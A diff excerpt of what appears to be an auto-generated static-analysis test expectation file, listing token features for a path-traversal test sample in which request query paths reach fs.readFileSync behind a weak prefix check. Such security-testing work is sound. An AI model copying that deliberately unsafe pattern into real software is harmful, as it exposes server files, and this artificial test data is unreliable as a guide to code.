| query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:339:36:339:40 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:339:42:339:45 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:339:42:339:45 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:339:42:339:45 | path | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:339:42:339:45 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:339:42:339:45 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:3 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:3 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:3 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:3 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:16 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:16 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:16 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:16 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:22 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:22 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:22 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:22 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:22 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:22 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:22 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:22 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:22 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:341:2:341:22 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:341:5:341:16 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:341:5:341:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:341:5:341:16 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:341:5:341:16 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:341:5:341:16 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:341:18:341:21 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:341:18:341:21 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:341:18:341:21 | path | calleeImports | fs | @@ -9484,6 +78352,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:341:18:341:21 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:341:18:341:21 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:341:18:341:21 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:8 | abs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:8 | abs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:8 | abs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:8 | abs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:8 | abs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs = p ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs = p ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs = p ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs = p ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs = p ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:21 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:21 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:21 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:21 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:21 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:29 | pathModule.resolve | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:29 | pathModule.resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:29 | pathModule.resolve | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:29 | pathModule.resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:29 | pathModule.resolve | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:343:23:343:29 | resolve | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:343:23:343:29 | resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:343:23:343:29 | resolve | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:343:23:343:29 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:343:23:343:29 | resolve | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:343:31:343:34 | path | CalleeFlexibleAccessPath | pathModule.resolve | | autogenerated/TaintedPath/normalizedPaths.js:343:31:343:34 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:343:31:343:34 | path | calleeImports | path | @@ -9493,6 +78401,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:343:31:343:34 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:343:31:343:34 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:343:31:343:34 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:8 | abs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:8 | abs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:8 | abs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:8 | abs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:8 | abs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:22 | abs.indexOf(root) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:22 | abs.indexOf(root) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:22 | abs.indexOf(root) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:22 | abs.indexOf(root) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:22 | abs.indexOf(root) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:22 | exceptional return of abs.indexOf(root) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:22 | exceptional return of abs.indexOf(root) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:22 | exceptional return of abs.indexOf(root) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:22 | exceptional return of abs.indexOf(root) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:22 | exceptional return of abs.indexOf(root) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:28 | abs.ind ... ) !== 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:28 | abs.ind ... ) !== 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:28 | abs.ind ... ) !== 0 | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:28 | abs.ind ... ) !== 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:345:6:345:28 | abs.ind ... ) !== 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:345:10:345:16 | indexOf | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:345:10:345:16 | indexOf | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:345:10:345:16 | indexOf | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:345:10:345:16 | indexOf | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:345:10:345:16 | indexOf | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:345:18:345:21 | root | CalleeFlexibleAccessPath | abs.indexOf | | autogenerated/TaintedPath/normalizedPaths.js:345:18:345:21 | root | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:345:18:345:21 | root | calleeImports | path | @@ -9502,6 +78435,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:345:18:345:21 | root | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:345:18:345:21 | root | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:345:18:345:21 | root | receiverName | abs | +| autogenerated/TaintedPath/normalizedPaths.js:345:28:345:28 | 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:345:28:345:28 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:345:28:345:28 | 0 | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:345:28:345:28 | 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:345:28:345:28 | 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:4 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:23 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:346:3:346:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:346:6:346:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:346:6:346:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:346:6:346:17 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:346:6:346:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:346:6:346:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:346:19:346:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:346:19:346:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:346:19:346:22 | path | calleeImports | fs | @@ -9511,6 +78474,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:346:19:346:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:346:19:346:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:346:19:346:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:3 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:3 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:3 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:3 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:16 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:16 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:16 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:16 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:22 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:22 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:22 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:22 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:22 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:22 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:22 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:22 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:22 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:349:2:349:22 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:349:5:349:16 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:349:5:349:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:349:5:349:16 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:349:5:349:16 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:349:5:349:16 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:349:18:349:21 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:349:18:349:21 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:349:18:349:21 | path | calleeImports | fs | @@ -9520,6 +78508,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:349:18:349:21 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:349:18:349:21 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:349:18:349:21 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:352:5:352:12 | rootPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:352:5:352:12 | rootPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:352:5:352:12 | rootPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:352:5:352:12 | rootPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:352:5:352:28 | rootPat ... s.cwd() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:352:5:352:28 | rootPat ... s.cwd() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:352:5:352:28 | rootPat ... s.cwd() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:352:5:352:28 | rootPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:352:5:352:28 | rootPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:352:5:352:28 | rootPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:22 | process | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:22 | process | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:22 | process | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:26 | process.cwd | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:26 | process.cwd | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:26 | process.cwd | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:28 | exceptional return of process.cwd() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:28 | exceptional return of process.cwd() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:28 | exceptional return of process.cwd() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:28 | process.cwd() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:28 | process.cwd() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:352:16:352:28 | process.cwd() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:352:24:352:26 | cwd | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:352:24:352:26 | cwd | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:352:24:352:26 | cwd | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:1:353:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| 